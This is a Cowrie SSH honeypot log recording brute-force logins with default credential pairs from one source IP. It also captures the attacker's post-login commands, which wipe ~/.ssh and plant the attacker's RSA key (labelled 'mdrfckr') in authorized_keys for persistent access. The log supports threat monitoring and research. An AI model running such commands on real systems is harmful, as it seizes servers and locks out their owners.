{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:30.879030Z","src_ip":"212.227.235.229","session":"49490c5c4895"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:32.108013Z","src_ip":"212.227.235.229","session":"49490c5c4895"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56048,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f93ed02850","protocol":"ssh","message":"New connection: 217.72.205.35:56048 (1.2.3.4:22) [session: 25f93ed02850]","sensor":"my-vps","timestamp":"2025-09-09T01:39:33.330977Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:33.332132Z","src_ip":"217.72.205.35","session":"25f93ed02850"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56222,"dst_ip":"1.2.3.4","dst_port":22,"session":"963e121d9b5c","protocol":"ssh","message":"New connection: 212.227.235.229:56222 (1.2.3.4:22) [session: 963e121d9b5c]","sensor":"my-vps","timestamp":"2025-09-09T01:39:36.147003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:36.147995Z","src_ip":"212.227.235.229","session":"963e121d9b5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:36.400490Z","src_ip":"212.227.235.229","session":"963e121d9b5c"}
{"eventid":"cowrie.login.failed","username":"zookeeper","password":"changeme","message":"login attempt [zookeeper/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:40.265791Z","src_ip":"212.227.235.229","session":"963e121d9b5c"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:42.649198Z","src_ip":"212.227.235.229","session":"963e121d9b5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34452,"dst_ip":"1.2.3.4","dst_port":22,"session":"88c1c3d76c8a","protocol":"ssh","message":"New connection: 212.227.235.229:34452 (1.2.3.4:22) [session: 88c1c3d76c8a]","sensor":"my-vps","timestamp":"2025-09-09T01:39:45.399473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:45.400783Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:45.518143Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.login.success","username":"root","password":"357951","message":"login attempt [root/357951] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.028381Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:39:46.278798Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.279551Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.280630Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.399014Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36116,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8137af1306","protocol":"ssh","message":"New connection: 212.227.235.229:36116 (1.2.3.4:22) [session: 0b8137af1306]","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.407023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.407777Z","src_ip":"212.227.235.229","session":"0b8137af1306"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.665209Z","src_ip":"212.227.235.229","session":"0b8137af1306"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:39:46.736599Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.737276Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.856589Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.857626Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45790,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ecff3ffcab7","protocol":"ssh","message":"New connection: 212.227.235.229:45790 (1.2.3.4:22) [session: 2ecff3ffcab7]","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.974684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:46.975463Z","src_ip":"212.227.235.229","session":"2ecff3ffcab7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:47.093653Z","src_ip":"212.227.235.229","session":"2ecff3ffcab7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:47.607771Z","src_ip":"212.227.235.229","session":"2ecff3ffcab7"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:47.737123Z","src_ip":"212.227.235.229","session":"0b8137af1306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53458,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff65605291e2","protocol":"ssh","message":"New connection: 212.227.235.229:53458 (1.2.3.4:22) [session: ff65605291e2]","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.020615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.021520Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.263149Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.727363Z","src_ip":"212.227.235.229","session":"2ecff3ffcab7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45796,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f8d57b5784","protocol":"ssh","message":"New connection: 212.227.235.229:45796 (1.2.3.4:22) [session: 14f8d57b5784]","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.844032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.844730Z","src_ip":"212.227.235.229","session":"14f8d57b5784"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.963551Z","src_ip":"212.227.235.229","session":"14f8d57b5784"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:48.995647Z","src_ip":"212.227.235.229","session":"0b8137af1306"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.274029Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.479691Z","src_ip":"212.227.235.229","session":"14f8d57b5784"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.599829Z","src_ip":"212.227.235.229","session":"88c1c3d76c8a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.600935Z","src_ip":"212.227.235.229","session":"14f8d57b5784"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:39:49.777183Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.777831Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:39:49.778857Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.022260Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58308,"dst_ip":"1.2.3.4","dst_port":22,"session":"87986beee13d","protocol":"ssh","message":"New connection: 212.227.235.229:58308 (1.2.3.4:22) [session: 87986beee13d]","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.441026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.441914Z","src_ip":"212.227.235.229","session":"87986beee13d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:39:50.610747Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.611433Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41072,"dst_ip":"1.2.3.4","dst_port":22,"session":"016b7b4ca10a","protocol":"ssh","message":"New connection: 212.227.235.229:41072 (1.2.3.4:22) [session: 016b7b4ca10a]","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.633609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.644722Z","src_ip":"212.227.235.229","session":"016b7b4ca10a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.665958Z","src_ip":"212.227.235.229","session":"87986beee13d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.855211Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.856665Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
